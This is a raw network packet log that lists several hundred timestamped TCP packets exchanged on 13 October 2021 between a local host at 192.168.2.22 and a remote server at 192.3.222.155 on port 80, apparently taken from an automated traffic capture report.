Oct 13, 2021 17:05:26.637831926 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637835026 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637870073 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637871027 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637908936 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637922049 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637948036 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637949944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.637988091 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.637988091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638025999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638029099 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638066053 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638072014 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638113022 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638114929 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638151884 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638154984 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638190985 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638194084 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638227940 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638231039 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638262987 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638274908 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638300896 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638303041 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638336897 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638339043 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638375998 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638385057 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638427019 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638427019 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638463974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638494968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638518095 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638533115 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638542891 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638561964 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638580084 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638621092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638622046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638658047 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638662100 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638695955 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638695955 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638735056 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638739109 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638771057 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638776064 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638808012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638808966 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638844967 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638847113 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638884068 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638905048 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638946056 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.638946056 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638983965 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.638987064 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639024019 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639029980 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639070034 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639072895 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639111042 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639126062 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639153004 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639182091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639223099 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639228106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639259100 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639266968 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639297962 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639303923 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639336109 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639338970 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639372110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639374971 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639409065 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639410019 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639446974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639450073 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639487982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639493942 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639534950 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639537096 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639573097 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639575958 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639611006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639611006 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639650106 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639652014 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639684916 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639688015 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639723063 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639724016 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639760017 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639763117 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639799118 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639806032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639847040 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639847994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639884949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639889002 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639924049 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639925003 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639961958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.639966011 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.639997959 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640002966 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640034914 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640036106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640070915 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640074015 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640111923 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640119076 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640158892 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640161037 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640197039 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640199900 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640233994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640237093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640271902 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640275002 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640295029 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640309095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640314102 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640346050 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640348911 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640383005 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640383959 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640423059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640429974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640471935 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640472889 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640508890 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640511990 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640547037 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640547991 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640583992 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640588045 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640620947 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640625000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640657902 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640659094 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640695095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640698910 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640743017 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640773058 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640785933 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640789032 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640794039 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640821934 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640825033 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640858889 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640860081 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640897036 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640897989 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640934944 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.640934944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640974045 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.640974045 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641011000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641011000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641048908 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641058922 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641100883 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641112089 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641134977 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641138077 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641190052 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641196966 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641236067 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641237974 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641275883 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.641278982 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.641314983 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.645834923 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.646764994 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805058956 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805212021 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805295944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805322886 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805392027 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805445910 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805495024 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805522919 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805546999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805619955 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805639982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805723906 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805775881 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805849075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805880070 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805907011 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.805907011 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805975914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.805982113 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806022882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806047916 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806058884 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806107044 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806148052 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806149006 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806154013 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806188107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806216002 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806221962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806243896 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806250095 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806304932 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806339025 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806359053 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806387901 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806399107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806401014 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806437969 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806471109 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806484938 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806514025 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806528091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806533098 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806566000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806597948 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806627035 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806654930 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806664944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806680918 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806700945 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806715012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806739092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806750059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806777000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806794882 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806833982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806849957 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806875944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806884050 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806912899 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806941032 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806953907 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.806969881 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.806993008 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807003975 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807029963 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807053089 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807068110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807084084 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807105064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807135105 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807194948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807230949 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807254076 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807270050 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807300091 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807329893 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807336092 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807359934 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807374001 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807390928 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807410955 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807440996 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807456970 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807471037 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807499886 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807502985 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807537079 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807560921 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807574034 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807595015 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807610989 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807625055 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807647943 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807658911 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807687044 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807704926 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807724953 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807737112 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807766914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807771921 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807815075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807836056 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807852030 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807868004 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807890892 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807929993 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807930946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807960987 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.807966948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.807990074 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808005095 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808022976 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808042049 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808056116 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808088064 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808089018 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808130980 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808152914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808166981 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808185101 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808203936 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808217049 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808242083 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808248043 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808279991 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.808305025 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.808332920 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814507961 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814558983 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814598083 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814599037 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814621925 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814635038 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814657927 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814677000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814709902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814726114 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814742088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814769030 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814786911 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814806938 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814821959 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814843893 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814847946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814905882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814954996 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.814980030 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.814996004 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815016985 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815025091 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815052032 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815059900 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815124035 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815139055 CEST	80	49167	192.3.222.155	192.168.2.22
